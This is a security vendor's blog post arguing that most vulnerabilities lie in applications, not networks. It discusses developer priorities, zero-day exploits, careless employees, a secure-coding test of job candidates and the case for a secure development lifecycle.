Here’s a hair-raising statistic: 70-90% of vulnerabilities exist in applications, not in networks. This means that whatever fancy Firewall, IPS, EDR, SIEM or other network security measures you’ve put in place, hackers can still breach your organization through any internet-enabled application on devices in your network. Chances are, most of your employees use at least one cloud-based application, such as Google Docs, which means your network is potentially at risk. This is because web apps need to be able to access the internet through a port (either 80 for HTTP or 443 for HTTPS), and if the app can access the internet, the internet can access the app. Your firewall leaves a big hole open so these ports can communicate freely with the net, so the security of your network is in the hands of the developer(s) behind your apps.
If you’re new to the cyber security field, you might be asking yourself, “So, can’t you just code secure software?” This is an excellent question, with a somewhat complicated answer, the short version of which is “sort of”. Unfortunately, you can’t ever be totally certain that your software is secure.
The long version comes to you in three parts:
1. Developers have priorities
2. Zero-Day exploits
3. Users can undermine even the most secure software
Let’s start from the top, shall we?
Developers Have Priorities
Sometimes security experts, in their tirade against so-and-so security oversight, forget that software developers have lots of priorities beyond security. Developers also have to worry about functionality, efficiency, consistency, and efficacy. From a developer perspective, coding securely can result in bloated, inefficient software, making it a pain to use. Developers who produce unfriendly software might find themselves short on work.
That being said, the risks associated with a company running insecure code is growing every year, and companies would be wise to ensure their software developers implement security best practice, even if it results in bloat. Developer priorities stem from the demands of their employers, so if security is a priority to your company, it’s best to let your developer know, and perhaps give them a little time to brush up on security best-practice. Also, vulnerabilities become exponentially more expensive as the software nears completion, resulting in a whopping 30x expense after release compared to the initial design phase (The Business Case For Security In The SDLC).
Even the biggest software applications from the biggest companies can fail. In 2013, Adobe was hacked, leaking the password and credit card information of over 150 million users. The cause of this breach was a zero-day vulnerability discovered by clever hackers, who designed a zero-day exploit based on a newly discovered vulnerability in Adobe Acrobat.
What is a zero-day vulnerability? Essentially, it’s a security flaw that was overlooked by the developers during the production of a piece of software. Hackers discover these flaws and begin to exploit them, and the developers have to scramble to patch the vulnerability before excessive damage is done.
These vulnerabilities exist due to the sheer size of many software development projects. Even if the developers were coding using best-practice techniques, applications can aggregate hundreds-of-thousands or millions of lines of code before they are released, making it nearly impossible to close every possible vulnerability. The fact that more of these hugely-distributed applications aren’t breached is a testament to the skill of professional developers and security professionals, but the point remains that a dedicated hacker, willing to pore through each line of code searching for exploits, will likely find a flaw eventually.
The message here is that the more secure your code is, the harder it is for a hacker to discover a zero-day vulnerability, and if you plug up almost every security gap, it probably won’t be worth the effort for a hacker to attempt a breach.
Users Can Undermine Secure Code
According to a research project conducted by Ponemon Institute, the biggest security risks in 2015 were careless employees, who used personal devices for work and/or worked from outside the office. It’s not hard to see why these behaviors are risky; connecting to company networks from insecure Wi-Fi networks, like you might find at a local coffee shop, can allow attackers to collect data through the shared network, or install malware on the employee’s personal device. Furthermore, because it is difficult to monitor the software running on employee devices, you never know when somebody will bring an application with a discovered zero-day vulnerability into your network. It’s also possible for an employee to inadvertently get a virus at home, which can spread into your company through their trusted connection. If attackers gather sensitive information, such as the architecture of your network, the nature of your network devices, or commonly used cloud-software in your company, it gives them ideas of how to most effectively attack in the future.
In order to be most safe in today’s hostile internet environment, security awareness and training is paramount. Your employees need to be versed in how to safely manage devices used for work, developers need to produce software with secure code, and company higher-ups need to make these measures a priority. Without a directed effort, breaches of the caliber of the Adobe leaks might become horrifyingly common.
Having seen the damage these threats pose first hand, we built our team with these problems front of mind, but even then, we were shocked by how bad the problem really is. When trying to recruit software developers at LMNTRIX, we tested over 160 candidates using the Secure Code Warrior SaaS platform that involved 12 basic secure coding challenges such as locating and identifying a solution for Cross-Site Scripting, Injection Flaws and Authentication. All developers had between 6-14 years’ experience and each one was given 2hrs to complete and access to Google. With candidates scoring 10%-30% – the result was astonishing to say the least!
Finding good developers is challenging and finding ones who can code securely is impossible for most industries as the ubiquity of software takes hold of everything from IoTs and automobiles to financial trading applications and healthcare.
Most companies are faced with having to maintain software quality and security while accelerating innovation. Companies with institutionalized, standard code development processes need new ways to further reduce overall program risk as the old method of testing software at the end of the development cycle is clearly not working.
To more effectively address security, companies need to adopt secure development lifecycle initiatives where security deliverables are inserted in all phases of development. This will result in fewer security incidents, faster time to remediate and earlier visibility into areas of risk.